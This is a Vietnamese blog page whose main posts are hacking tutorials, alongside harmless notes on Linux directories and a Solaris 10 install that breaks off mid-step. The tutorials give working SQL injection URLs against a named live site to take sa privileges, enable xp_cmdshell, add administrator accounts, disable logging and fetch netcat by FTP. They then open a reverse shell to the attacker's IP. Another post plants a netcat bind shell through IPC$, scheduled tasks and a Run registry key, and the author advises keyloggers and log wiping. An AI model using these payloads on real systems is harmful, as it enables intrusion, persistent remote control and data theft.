Thursday, January 31, 2008

Các lệnh command thường dùng

TCP/IP commands:

telnet
netstat
nslookup
tracert
ping
ftp

NetBIOS commands (just some examples):
nbtstat
net use
net view
net localgroup

Nén file trong Windows

C:\WINNT\system32>rar a f.zip d:\infostore\replicate\*.*
C:\WINNT\system32>copy /y f.zip d:\infostore\master\readme.txt

Nén file trong redhat

zip -9 -r

SQL Injection và nâng quyền với sa

Uhm dạo này đói kém cc ,sau một hồi tìm kiếm shop mong kiếm được chút cháo trên google thì tình cờ tìm được site

http://www.darksidecreations.com/category.asp?catcode=10

Chà site s-e-x thêm đại dấu ‘ vô

http://www.darksidecreations.com/category.asp?catcode=10′

KIỂM TRA
dính rồi … vui quá … nhào dzô check tiếp nào

http://www.darksidecreations.com/category.asp?catcode=10 and 1=convert(int,@@servername)--sp_password

Vậy là được Server name là : BACKUP

tiện thể làm luôn cái tên DB
http://www.darksidecreations.com/category.asp?catcode=10 and 1=convert(int,db_name())--sp_password

Được Database Name là : darkside

chậc đúng là dark ( site sex mà )

Kiểm tra cái thằng system user xem nào ..

http://www.darksidecreations.com/category.asp?catcode=10 and 1=convert(int,system_user)--sp_password

wow … hay quá nè … System_User ’sa’ ….
lúc này nghĩ ngay tới việc hack server … đã thiệt …

Kiểm tra coi thằng ku SAdmin nó có Enable cái OpenRowSet cho mình không ha

http://www.darksidecreations.com/category.asp?catcode=10;select%20*%20from%20openro wset(’sqloledb’,”;;,”)--sp_password

NÂNG & CHIẾM QUYỀN
Giờ .. làm gì nhỉ ??
ah đưa mình (Guest) dzô DB OWNER của DB Master .

Tại sao lại phải đưa Guest vào DataBase Owner cuar DataBase Master?
Bở vì la` DB Owner của Db Master mới có quyền thực hiện lệnh xp_regwrite,xp_regdeletevalue và xp_cmdshell.
Tại sao Guest lại sử dụng 2 lệnh xp_regwrite,xp_regdeletevalue và xp_cmdshell
Bởi vì :
xp_regwrite dùng để thực hiện lệnh ghi lên Registry của Windows
xp_regdeletevalue dùng để xóa dữ liệu trong Registry của Windows
xp_cmdshell dùng để gửi lệnh lên Windows dùng đề nâng quyền , chiếm quyền , cài backdoor …..

Còn đây là lệnh để đưa Guest vào Db Owner của Db Master

http://www.darksidecreations.com/category.asp?catcode=10;exec sp_executesql N’create view dbo.test as select * from master.dbo.sysusers’exec sp_msdropretry ‘xx update sysusers set sid=0×01 where name=”dbo”’,'xx’ exec sp_msdropretry ‘xx update dbo.test set sid=0×01,roles=0×01 where name=”Guest”’,'xx’ exec sp_executesql N’drop view dbo.test’--sp_password

Nếu chạy links trên mà không báo lỗi và được trả về trang :
http://www.darksidecreations.com/category.asp?catcode=10
tức là bạn đã thực hiện thành công việc đưa Guest vào Db Owner của Db Master nhưng để cho chắc ăn mình vẫn kiểm tra lại một lần nữa bằng cách sau :

http://www.darksidecreations.com/category.asp?catcode=10%20%20and%201=convert(int,( select%20top%201%20name%20from%20master..sysusers% 20where%20roles=0×01%20and%20name%20not%20in(’dbo’ )))--sp_password

Vậy là xong giờ thì thoải mái chạy xp_regwrite với cả xp_cmdshell
Có thể chạy xp_regwrite ,xp_regdeletevalue với xp_cmdshell rồi thì làm gì ???
Giờ login vào Database với user BUILTIN\ADMINISTRATOR với password = “”
chạy thế này ;

http://www.darksidecreations.com/category.asp?catcode=10;exec%20sp_executesql%20N’c reate%20view%20dbo.test%20as%20select%20*%20from%2 0master.dbo.sysxlogins’%20exec%20sp_msdropretry%20 ‘xx%20update%20sysusers%20set%20sid=0×01%20where%2 0name=”dbo”’,'xx’%20exec%20sp_msdropretry%20′xx% 20update%20dbo.test%20set%20xstatus=18%20where%20n ame=”BUILTIN\ADMINISTRATORS”’,'xx’%20exec%20sp_e xecutesql%20N’drop%20view%20dbo.test’--sp_password

Vậy là ta có một chú nằm vùng trong Db của nó … he he sau này mọi mệnh lệnh đề phải thông qua chú này …

Nhưng giờ xài xp_regwrite trước ha ..
Giờ mình dùng xp_regwrite để Enable cái OpenRowset đã bị thằng ku SysAdmin kia Disable ( tuy giờ đã Enable nhưng mình vẫn viết ra để các bạn biết )

http://www.darksidecreations.com/category.asp?catcode=10;exec master..xp_regwrite HKEY_LOCAL_MACHINE,’SOFTWARE\Microsoft\MSSQLServer \Providers\SQLOLEDB’,’AllowInProcess‘,REG_DWORD,1--sp_password

http://www.darksidecreations.com/category.asp?catcode=10;exec master..xp_regwrite HKEY_LOCAL_MACHINE,’SOFTWARE\Microsoft\MSSQLServer \Providers\SQLOLEDB’,’DisallowAdhocAccess‘,REG_DWORD,0--sp_password

Để ý mấy chỗ in đậm nhé:
1 : Enable
0 : Disable

he he chạy mà nó trả về trang chủ là thành công khỏi check
Giờ thì xài cái thằng xp_regdeletevalue để hủy chức năng ghi log và lọc dữ liệu của WINDOWS

http://www.darksidecreations.com/category.asp?catcode=10;exec master..xp_regdeletevalue ‘HKEY_LOCAL_MACHINE’,'SYSTEM\CurrentControlSet\Ser vices\Tcpip\Parameters’,'EnableSecurityFilters’--sp_password

Giờ thì các bạn khỏi lo bị ghi log chính vì thế mình bỏ cái sp_password đi cũng được ^_^ nhưng bạn để lại cũng chẳng sao
Giờ đến lúc bật cái xp_cmdshell lên … à các bạn lưu ý nha ở trên là cho phép chạy xp_cmdshell còn ở đây là bật xp_cmdshell và allow updates kẻo lại chửi oan mình thì chết ….

http://www.darksidecreations.com/category.asp?catcode=10;select * from openrowset(’sqloledb’, ’server=BACKUP;uid=BUILTIN\Administrators;pwd=’, ’set fmtonly off select 1 exec master..sp_addextendedproc xp_cmd,”xpsql70.dll” exec sp_configure ”allow updates”, ”1” reconfigure with override’)--sp_password

Vậy là xong giờ thì dùng tới thằng xp_cmdshell để upload netcat
Giờ các bạn chuẩn bị cho mình thế này:
+ 1 Host có hộ trợ ftp
+ Backdoor Netcat

http://www.darksidecreations.com/category.asp?catcode=10;select%20*%20from%20openro wset(’sqloledb’,’server=BACKUP;uid=BUILTIN\Adminis trators;pwd=’,’set%20fmtonly%20off%20select%201%20 exec%20master..xp_cmdshell%20″echo%20open Domain%3Eftp %26 echo%20user%20user%20pass%3E%3Eftp %26 echo%20bin%3E%3Eftp %26 echo%20get file%3E%3Ef %26 echo quit%3E%3Ef”‘)--sp_password

Bước này là để tạo 1 file batch chứa những lệnh của FTP có nội dung như sau:
1. open domain //Domain của bạn
2. user user pass // User và Pass Login vào FTP
3. bin //Dạng Binary (Có 2 dạng ASCII và Binary)
4. get file //Tải file về nhớ điền đẩy đủ name và ext nhé
5. quit //đóng kết nối

Ở trên dùng lệnh echo >ftp (%3Eftp) và echo >>ftp (%3E%3Eftp) để ghi ra file ftp ở Windows thì dùng + (%26) nếu muốn chạy nhiều command trên 1 dòng

yep tiếp theo là chạy ftp để tải file netcat về

http://www.darksidecreations.com/category.asp?catcode=1;select%20*%20from%20openrow set(’sqloledb’,’server=BACKUP;uid=BUILTIN\Administ rators;pwd=’,’set%20fmtonly%20off%20select%201%20e xec%20master..xp_cmdshell%20″ftp -v -i -n -s:ftp”‘)--sp_password

Nếu các bạn thắc mắc về ftp -v -i -n -s:ftp
thì có thể vào Run->cmd gõ ftp -h để xem hoặc xem ở dưới ^_^

Quote:
Transfers files to and from a computer running an FTP server service
(sometimes called a daemon). Ftp can be used interactively.

FTP [-v] [-d] [-i] [-n] [-g] [-s:filename] [-a] [-w:windowsize] [-A] [host]

-v Suppresses display of remote server responses.
-n Suppresses auto-login upon initial connection.
-i Turns off interactive prompting during multiple file
transfers.
-d Enables debugging.
-g Disables filename globbing (see GLOB command).
-s:filename Specifies a text file containing FTP commands; the
commands will automatically run after FTP starts.
-a Use any local interface when binding data connection.
-A login as anonymous.
-w:buffersize Overrides the default transfer buffer size of 4096.
host Specifies the host name or IP address of the remote
host to connect to.

Notes:
- mget and mput commands take y/n/q for yes/no/quit.
- Use Control-C to abort commands.

Nếu sau khi chạy bạn được chuyển về trang chủ thì tức là đã tải file thành công nhưng nếu bạn muốn kiểm tra lại thì dùng cách sau :

http://www.darksidecreations.com/category.asp?catcode=10;drop table checknc create table checknc (id int identity,result varchar(1000)) insert into checknc exec master..xp_cmdshell ‘dir filename‘--sp_password

filename: bạn điền chính xác tên file backdoor của bạn
sau đó chạy
http://www.darksidecreations.com/category.asp?catcode=10 and 1=convert(int,(select result from checknc where id=6))--sp_password

tại sao id=6 tại dỉ khi gõ dir filename thì

03/24/2006 06:54 AM 11,776 filename

nằm ở dòng thứ 6 ^_^
Có netcat rồi giờ tới bước kết nối vào shell ^_^
À trước tiên các bạn nên biết về command của netcat nhỉ ^_^
Quote:
connect to somewhere: nc [-options] hostname port[s] [ports] …
listen for inbound: nc -l -p port [options] [hostname] [port]
options:
-d detach from console, background mode

-e prog inbound program to exec [dangerous!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, …
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-L listen harder, re-listen on socket close
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]

Yep giờ ở máy của bạn hãy vào Run->Cmd sau đó cd tới thư mục bạn chứa netcat chạy lệnh sau

nc -l -p 1786 -vv

1786 bạn có thể thay bằng bất cứ port nào bạn muốn
Giờ chạy ở Server :
http://www.darksidecreations.com/category.asp?catcode=10;select%20*%20from%20openro wset(’sqloledb’,’server=BACKUP;uid=BUILTIN\Adminis trators;pwd=’,’set%20fmtonly%20off%20select%201%20 exec%20master..xp_cmdshell%20″nc1.exe -e cmd.exe -d 58.187.32.40 1786″‘)--sp_password

command là nc1.exe -e cmd.exe -d 58.187.32.40 1786
nc1.exe là file netcat bạn vừa up lên server
58.187.32.40 là IP của bạn
1786 là port bạn vừa cho netcat chờ sẵn
-e cmd.exe thì xem ở trên ^_^

ok chạy xong quay về màn hình cmd.exe ở máy tính của bạn sẽ thấy như sau :

vậy là bạn đang ở cmd.exe của Server đấy gõ ipconfig thì biết

giờ tới tiết mục add user và đưa user vào group admin

command để chạy gồm có:
net user username password /add /domain

VD: net user elitematrix kenda4455 /add /domain

Giờ Add vào LocalGroup Administrator

net localgroup Administrators elitematrix /add

Có quyền Admin … nếu muốn Remote Desktop nữa thì

net localgroup “Remote Desktop Users” /add

Mở Remote Desktop Connection ra chứ còn chờ gì nữa

Vậy là ta có toàn quyền điều khiển server ^_^

Để hoàn thiện hơn, góp ý thêm một số chi tiết như sau :
1. Thực ra về kỹ thuật, cái này tại thời điểm hiện tại ko elite mấy đâu, cách đây 2 năm thì đúng thế.
2. Điểm elite ở đây là ý tưởng Add Group Remote cho User (chỗ này xin bản quyền ý tưởng của tôi tý)
3. Nếu một Hacker có kinh nghiệm, thì sau khi hoàn tất bước trên, sẽ làm ba bước như sau :
- Nâng quyền + set pass cho các user mặc định ít bị chú ý đến như : Guest, IWAN…chú ý enable user lên nếu cần
- Cài Keylogger vô Server, hay 1 malware tương tự.
- Xóa logs trước khi thoát khỏi Server.

Như vậy có thể đảm bảo rằng duy trì xâm nhập được lâu dài và bảo đảm an toàn được cho Attacker.

Khai thác SQL Injection khi system_user là sa

Trong TUT này chúng ta sẽ tìm hiểu

- Enable xp_cmdshell trên SQL Server 2005

- Chèn thêm user vào SQL Server

- Attack Server

- Enable Remote Desktop của server

- Kiểm tra xem System_User hiện tại có quyền ngang = sa ko

- Tương tác với Registry của Server



Enable xp_cmdshell trên SQL Server 2005

- Như anh em biết thì thằng SQL Server 2005 nó để mặc định là Disable lệnh xp_cmdshell nghĩa là ngay cả khi có tài khoản SQL là "sa" ta cũng không thể chạy đc. các câu lệnh cmd

+ Ví dụ victim là www.victim.com/hihi.asp?id=1 (thằng này có system_user = sa luôn nhá) , khi ta chạy

www.victim.com/hihi.asp?id=1;exec master..xp_cmdshell 'ipconfig'--sp_password

thì nó sẽ báo

Msg 15281, Level 16, State 1, Procedure xp_cmdshell, Line 1
SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', see "Surface Area Configuration" in SQL Server Books Online.

Nhưng mà vì có "sa" trong tay ^^ (Nghe như sa tăng) nên cái này ta vẫn có thể enable đc. bằng cách dùng sp_configure

www.victim.com/hihi.asp?id=1;exec sp_configure 'show advanced options', 1--sp_password ===> câu lệnh này là ta bật show advanced options thì mới có thể enable xp_cmdshell đc. (vì thằng xp_cmdshell nằm trong đó) ... Nếu nó ko báo lỗi gì mà trở lại trang www.victim.com/hihi.asp?id=1 thì anh em tiếp tục xuống dưới

www.victim.com/hihi.asp?id=1;reconfigure--sp_password ===> câu này để ta reconfigure lại để nó bắt đầu bật show advanced options ... Nếu nó ko báo lỗi gì mà trở lại trang www.victim.com/hihi.asp?id=1 thì anh em tiếp tục xuống dưới

www.victim.com/hihi.asp?id=1;exec sp_configure 'xp_cmdshell', 1--sp_password ===> bắt đầu enable xp_cmdshell ... Nếu nó ko báo lỗi gì mà trở lại trang www.victim.com/hihi.asp?id=1 thì anh em tiếp tục xuống dưới

www.victim.com/hihi.asp?id=1;reconfigure--sp_password ===> câu này để ta reconfigure lại để nó bắt đầu bật xp_cmdshell

Oke xong , bi h chạy thử phát nhỉ www.victim.com/hihi.asp?id=1;exec master..xp_cmdshell 'ipconfig'--sp_password ====> ko báo lỗi gì ^^ ...

À nhưng mà lưu ý với anh em là mặc dù đã enable xp_cmdshell nhưng chưa chắc đã làm đ.c gì nó đâu , tại vì thằng SQL Server 2005 nó ko cho chạy các lệnh như "net user millkak millkak /add" , :| ngay cả active cái user Guest "net user Guest /active" nó còn ko cho >"<...


Chèn thêm user vào SQL Server

Bây h vẫn Victim là www.victim.com/hihi.asp?id=1 (vẫn cho system_user = sa nhá)

Add thêm user vào SQL Server làm gì ??? Là để ta có thể login vào SQL Server của họ = Query Analyzer trong Microsoft SQL Server để có thể viết Query vừa nhanh + dễ dàng hơn (hoặc để nằm vùng cũng cực tốt), bác nào ko có Microsoft SQL Server thì nên cài :| (mua đĩa hết có 8k thui , bản Personal thui nhá)

Oke , bắt đầu nhỉ , đầu tiên là tạo ra user đã

www.victim.com/hihi.asp?id=1;exec sp_addlogin 'millkak', 'millkakpass'--sp_password ===> Ta vừa tạo thêm 1 user trong SQL Server của nó với username là millkak và password là millkakpass

Khi đã có user rùi thì ta phải add nó nên quyền quản trị cao nhất (ngang = sa)

www.victim.com/hihi.asp?id=1;exec sp_addsrvrolemember 'millkak', 'sysadmin'--sp_password ===> Add user millkak vào role Sysadmin (nghĩa là = sa đó)

Oke , bi h mở Query Analyzer và login thui ^^


Attack Server

-Phần này là phải xin phép bác dondoc rùi đây (mặc dù cái này mill cũng bít :">)

-victim vẫn là www.victim.com/hihi.asp?id=1 (sa)

www.victim.com/hihi.asp?id=1;exec master..xp_cmdshell 'net user millkak millkakpass /add'--sp_password ===> Add thêm user cho window với username = millkak và password = millkakpass

www.victim.com/hihi.asp?id=1;exec master..xp_cmdshell 'net localgroup administrators millkak /add'--sp_password ===> Add user millkak vào group administrators

www.victim.com/hihi.asp?id=1;exec master..xp_cmdshell 'net localgroup "Remote Desktop Users" millkak /add'--sp_password ===> Add user millkak vào group Remote Desktop Users để nó có quyền Remote Desktop ý mà

Dondoc : Vậy là bây giờ bạn đã có thêm 1 tài khoản admin với password là millkakpass với quyền hệ thống và có thể remote desktop.
Chọn remote desktop như sau :
(Start->programs->accessories->communications->Remote Desktop)
Hoặc vào run gõ "mstsc"

Giờ chỉ cần điền IP và username : millkak và password là millkakpass , bạn đã login vào server và làm những gì mình muốn.

Phần này của bác Trickmaster (học cùng trg` với tớ :|) đây , upload file lên server qua ftp (có sửa đi 1 chút)

www.victim.com/hihi.asp?id=1;exec master..xp_cmdshell 'echo open ftp.Your_Domain.com>ftp&echo user Your_User Your_Pass>>ftp&echo get Your_File>>ftp&echo quit>>ftp'--sp_password ===> tạo file batch chứa những lệnh của FTP

www.victim.com/hihi.asp?id=1;exec master..xp_cmdshell 'ftp -v -i -n -s:ftp'--sp_password ===> thực thi lệnh của file batch

ftp.Your_Domain.com : chỗ này là domain của bạn , ví dụ ftp.vniss.net

Your_User : đây là username đăng nhập vào ftp

Your_Pass : password đăng nhập vào ftp

Your_File : file mà bạn muốn up lên server (file phải nằm trên host ftp của bạn) , ví dụ nc.exe

Ví dụ bạn có 1 host ftp là ftp.vniss.net với username là millkak và pass là millkakpass , bạn muốn up file nc.exe từ trên host ftp đó lên server thì bạn làm

www.victim.com/hihi.asp?id=1;exec master..xp_cmdshell 'echo open ftp.vniss.com>ftp&echo user millkak millkakpass>>ftp&echo get nc.exe>>ftp&echo quit>>ftp'--sp_password

www.victim.com/hihi.asp?id=1;exec master..xp_cmdshell 'ftp -v -i -n -s:ftp'--sp_password

sau khi chạy xong bạn có thể kiểm tra xem file đã đc. up lên server hay chưa

www.victim.com/hihi.asp?id=1;drop table millkak create table millkak (id int identity,noi_dung varchar(1000)) insert into millkak exec master..xp_cmdshell 'dir Your_File'--sp_password ===> tạo 1 table lưu giữ nội dung của câu lệnh exec master..xp_cmdshell 'dir Your_File' bạn nhớ là Your_File = tên file mà bạn vừa up lên , ví dụ nc.exe...

www.victim.com/hihi.asp?id=1 and 1=convert(int,(select noi_dung from millkak where id=6))--sp_password

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '06/23/2007 04:56 PM 579 nc.exe' to a column of data type int. ===> thành công :)


Enable Remote Desktop của server

Cái này còn trong giai đoạn thử nghiệm thui :( , thui cứ viết ra , anh em nào đọc xong mà đóng góp gì thì pm nick name yahoo : millkak

- Ức chế nhất là thằng nào chạy server mà ko enable cái Remote Desktop cho mình nhờ >"< :P , thui anh em thử cách này xem có enable đc. ko nhớ

- Victim vẫn là www.victim.com/hihi.asp?id=1 nhá (vẫn sa)

www.victim.com/hihi.asp?id=1;exec master..xp_regwrite HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnection',REG_DWORD,0--sp_password ===> ghi khóa registry cho fDenyTSConnection với giá trị = 0

Tiếp tục anh em ơi

www.victim.com/hihi.asp?id=1 and 1=convert(int,@@servername)--sp_password ===> lấy tên server để còn khỏi động lại ^^

www.victim.com/hihi.asp?id=1;exec master..xp_cmdshell 'shutdown -m \\tên_server -r'--sp_password ===> restart máy nào ^^

Okie bi h chờ ít phút cho cái server nó khởi động lại rùi anh em bật Remote Desktop lên và connect


Kiểm tra xem System_User hiện tại có quyền ngang = sa ko

Đôi lúc có những System_user có quyền ngang = sa :) nhưng lúc query chúng ta ko thấy nó có tên là 'sa' nên thường bỏ qua ...

Có 1 cách để bạn kiểm tra xem System_user đó có nằm trong role sysadmin ko (ngang = sa)

VICTIM : www.victim.com/hihi.asp?id=1

- Kiểm tra System_User www.victim.com/hihi.asp?id=1 and 1=convert(int,system_user)--sp_password

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'millkak' to a column of data type int.

- Như vậy là System_user mà thằng victim này đang dùng có tên là millkak , bây h ta thử kiểm tra xem millkak có quyền ngang = sa ko

www.victim.com/hihi.asp?id=1;drop table check_sysuser create table check_sysuser (id int identity,noi_dung varchar(1000)) insert into check_sysuser select sysadmin from master..syslogins where name = 'millkak'--sp_password ===> tạo ra 1 table tên check_sysuser và chèn giá trị out put của câu query select sysadmin from master..syslogins where name = 'millkak' vào trường noi_dung của table...

http://www.iitkalumni.org/Souvenir/addCart.asp?PID=4 and 1=convert(int,(select top 1 noi_dung%2b'/' from check_sysuser where id=1))--sp_password ===> Select giá trị của trường noi_dung , bạn chú ý %2b nghĩa là dấu + trên IE nhưng ko hiểu sao trên firefox nó ko nhận dấu + :| , thui các bạn cứ để là %2b nhá ...

Nếu sau khi chạy xong link kia mà nó báo

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '1/ ' to a column of data type int. ===> Nghĩa là tài khoản SQL millkak có quyền ngang = sa :)

Còn nó mà báo lỗi

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '0/ ' to a column of data type int. ===> Nghĩa là tài khoản SQL millkak ko có quyền hành = sa , ta chỉ có thể khai thác bt đc. thui


Tương tác với Registry của Server

Như các bạn đã biết là Registry rất quan trọng trong hệ thống của window , khi có system_user = 'sa' trong tay thì bạn có thể tương tác vào registry của máy chủ

Victim : www.victim.com/hihi.asp?id=1 (sa)

--Del 1 khóa registry

www.victim.com/hihi.asp?id=1;exec xp_regdeletekey 'rootkey', 'key'--sp_password ===> các bạn chú ý 'rootkey''key' là đường dẫn đến khóa registry đó ...

Ví dụ mill muốn xóa 1 khóa registry TestValue ở 'HKEY_LOCAL_MACHINE\SOFTWARE\Test' thì sẽ là

www.victim.com/hihi.asp?id=1;exec xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Test\TestValue'--sp_password

--Đọc giá trị 1 khóa registry

Ví dụ bạn muốn đọc khóa registry fDenyTSConnectionHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server xem nó có giá trị = bao nhiêu thì bạn đầu tiên phải query

www.victim.com/hihi.asp?id=1;drop table millkak create table millkak (id int identity,noi_dung1 varchar(99), noi_dung2 varchar(99)) insert into millkak EXEC master..xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnection'--sp_password ===> tạo ra 1 table lưu trữ giá trị registry của khóa đó

Sau đó bạn phải select dữ liệu trong đó ra (để xem)

www.victim.com/hihi.asp?id=1 and 1=convert(int,(select top 1 noi_dung1%2b'/'%2bnoi_dung2 from millkak where id=1))--sp_password ===> %2b = dấu +

Nếu nó hiện lỗi

[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'fDenyTSConnection/0' to a column of data type int. ===> có nghĩa là khóa fDenyTSConnection có giá trị = 0

--Ghi thêm + Sửa giá trị của khóa registry

Ví dụ Mill sẽ sửa giá trị của fDenyTSConnectionHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server thành 1

www.victim.com/hihi.asp?id=1;exec master..xp_regwrite HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnection',REG_DWORD,1--sp_password


Tuesday, January 29, 2008

Cấu trúc thư mục Linux

Cấu trúc thư mục không giống như trong Windows và các hệ điều hành khác, hệ thống tập tin trong Linux là một cây rất lớn (big tree). Thư mục Root ( / ) là thư mục gốc, các tập tin và các ổ đĩa khác chỉ là nhánh của Root.

Ví dụ: nếu bạn có 2 đĩa cứng a và b, một đĩa mềm và một ổ CD-ROM. Hãy giả sử rằng ổ đĩa thứ nhất có 2 phân vùng (partition) là a1 và a2, ổ đĩa thứ 2 chỉ có một phân vùng là b.

Trong Windows
  • ổ cứng a, phân vùng a1 (hda1): ổ đĩa C
  • ổ cứng a, phân vùng a2 (hda2): ổ đĩa D
  • ổ cứng b, một phân vùng b1 (hdb1): ổ đĩa E
  • ổ đĩa mềm: ổ A
  • ổ đĩa CD-ROM: ổ F
Ngược lại, trong Linux, mỗi ổ đĩa sẽ được gắn kết (mount) vào trong cây thư mục (Tree Directory) giống như là một thư mục bình thường:
  • hda1: / (Root)
  • hda2: /home
  • hdb1: /home/user/music
  • ổ đĩa mềm: /mnt/floppy
  • ổ CD-ROM: /mnt/cdrom

So sánh cấu trúc hệ thống tập tin giữa Linux và Windows

Đột nhập và điều khiển máy tính từ xa

Giả sử rằng bạn đã có username,password của admin của máy victim rồi: giờ thiết lập 1 phiên làm viêc:

CODE

C:\> net use \\x.x.x.x\IPC$ “password” /user:”administrator” The command completed successfully.

Sau đó ta cần copy backdoor để điều khiển máy victim có rất nhiều loại backdoor nhưng tôi thấy hơn cả vẫn là : netcat ( nc) chép nc vào máy victim

CODE

C:\>copy nc.exe \\x.x.x.x\ADMIN$\nc.exe The command completed successfully. 1 file copies

Chạy service Schedule trên máy victim ( có service này mới thực thi đ ươc các file trên máy victim, mặc đinh khi cài win sẽ chạy service này)

CODE

C:\> sc \\x.x.x.x start schedule service_name : schedule

Bây giờ kiểm tra giờ trên máy victim

CODE

C:\> net time \\x.x.x.x Current time at \\10.0.0.31 is 6/29/2005 4:50 AM The command completed successfully.

Bây giờ chạy netcat ở chế độ ẩn lắng nghe cổng 111:

CODE

C:\>AT \\x.x.x.x 4:55 /interactive “c:\windows\nc.exe” –L –d –p111 –e cmd.exe Added a new job with job ID = 1

đợi đến 4:55 rồi chạy thử nc.exe

CODE

C:\>nc –nvv x.x.x.x 111 (UNKNOWN) [x.x.x.x] 111 (?) open Microsoft Windows XP [Version 5.1.2600] © Copyright 1985-2001 Microsoft Corp. C:\windows>

Bây giờ làm gì thì tuỳ nha ( nhưng đừng có phá hoại người ta nhe’) Vấn đề là làm sao cho những lần sau victim bật máy tính lên netcat tự động chạy và lắng nghe mệnh lệnh của ta? Bạn có thể cho netcat khởi động cùng windows. "moi" file netcat.reg (dùng notepad và save lại thành .reg) có nội dung như sau:

CODE

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] "netcat"="\"C:\\nc\\nc.exe\" -L -d -p111 -e cmd.exe"

Sau đó copy sang máy victim và chạy nha! Hy vọng mọi người đừng phá hoại nha ! Thân

Hướng dẫn cài đặt Solaris 10

[Hệ thống sử dụng trong bài viết]

  • Phiên bản Solaris: Solaris 10 Production Release General Avaibility (GA 03/05)
  • Hardware architecture: Intel x86
  • CPU: Intel Pentium IV 1.5 GHz
  • RAM: 512 MB
  • Hard disk: 20 GB
  • Đĩa cài đặt: DVD (sol-10-GA-x86-dvd)

[Cài đặt]

Phần hướng dẫn sau đây giả định bạn sẽ dùng toàn bộ đĩa cứng để cài Solaris 10. Cách cài Solaris chung với Windows or/and Linux tôi xin hẹn dịp khác. Bạn có thể tham khảo Multi-booting Solaris and other operating systems để có thể cài đặt đồng thời Solaris, Windows, Linux lên trên một hay nhiều ổ cứng.

Nhét đĩa DVD (sol-10-GA-x86-dvd) vào máy, reboot.

Select the type of installation you want to perform
Chọn: 1 Solaris Interactive bằng cách nhấn [Enter]

Sau bước trên, Solaris thực hiện hàng loạt các tác vụ detect và config phần cứng, trong khoảng thời gian từ 2 tới 5 phút. Trong bước này, thật đáng tiếc là Solaris không nhận ra USB keyboard và USB mouse của tôi. Tuy nhiên, đây không phải là vấn đề nghiêm trọng, tôi có nhiều chuột và bàn phím dự bị nên đã nhanh chóng thay loại USB bằng loại thường (PS/2). Qúa trình cài đặt tiếp tục.

Tiếp theo là các bước interactive trong đó người dùng phải trả lời các câu hỏi để thiết định việc cài đặt.

Màn hình Select a Language
Đây là bước lựa chọn ngôn ngữ của qúa trình cài đặt, đồng thời cũng là ngôn ngữ mặc định của Solaris về sau nàỵ Solaris hỗ trợ hoàn hảo 9 ngôn ngữ sau: Anh, Pháp, Đức, Ý, Nhật, Hàn, Trung, Tây Ban Nha, Thụy Điển. Bạn lựa chọn ngôn ngữ thích hợp nhất với mình. Ở đây tôi lựa tiếng Anh.

Please make a choice (0 - 9), or press h or ? for help: 0 [Enter]

Trình cài đặt đồ hoạ của Solaris bắt đầu với màn hình Welcome. Chỉ việc nhấn [Next]

Màn hình Host Name
Đây là bước đặt tên cho máy tính, tôi chọn solaris

Màn hình Time Zone
Đây là bước đặt thời gian cho máy tính, tôi để như mặc định.

Màn hình Continent and Country
Tiếp tục đặt thời gian cho máy tính, tôi chọn Asia, Japan

Màn hình Date and Time
Tiếp tục đặt thời gian cho máy tính, tôi để như mặc định.

Màn hình Root Password
Phần thiết lập mật khẩu cho root, nhập password và nhấn [Next]

Màn hình Confirm Information
Xác nhận các thông tin về tên máy và múi giờ.

Tiếp theo là qúa trình cài đặt thực sự.

Màn hình Welcome

Màn hình Installer Options
Tôi để tất cả như mặc định.

Màn hình Notice
Thông báo nói rằng: nếu muốn bỏ qua các qúa trình thiết lập ban nãy để tiếp tục cài đặt, hãy lấy đĩa cài đặt ra. Nhấn [OK] mà không lấy đĩa ra như thông báo, chúng ta chỉ có một đĩa cài đặt thôi mà.

Màn hình Specify Media
Đây là phần chọn nguồn để cài đặt, tôi để như mặc định (CD/DVD).

Sau bước trên trình cài đặt sẽ access tới các gói chương trình trong DVD và tiếp tục việc cài đặt.

Màn hình License
Nếu đồng ý với các điều khoản về bản quyền của Sun, chọn Accept

Màn hình Select Type of Install
Tôi chọn như mặc định: Custom Install

Màn hình Select Software Localizations
Đây là phần chọn localization cho Solaris, tôi đang sống tại Nhật và cần làm việc nhiều với tiếng Nhật nên chọn Asia, Japanese (ja, ja_JP.PCK, ja_JP.UTF-8)

Màn hình Select System Locale
Đây là phần chọn locale mặc định cho Solaris, tôi muốn chọn Japanese (Japan, UTF-8) nhưng e việc đó sẽ ảnh hưởng tới tính phổ biến của tài liệu này nên để như mặc định: English (POSIX C). Tôi có thể dễ dàng thay đổi thiết định này về sau, khi dùng với mục đích cá nhân.

Màn hình Select Products
Đây là phần chọn các sản phẩm khác có liên quan tới Solaris. Tôi để như mặc định: Không lựa chọn sản phẩm nào.

Màn hình Additional Products
Tôi để như mặc định: None

Màn hình Select Solaris Software Group
Người dùng kinh nghiệm nên chọn những mục cần thiết và bỏ qua các mục không liên quan. Người mới bắt đầu với Solaris nên chọn tất cả để có thể khám phá tất cả những tính năng của hệ điều hành mới này. Tôi để như mặc định: Entire Group, Default Packages

Màn hình Disk Selection
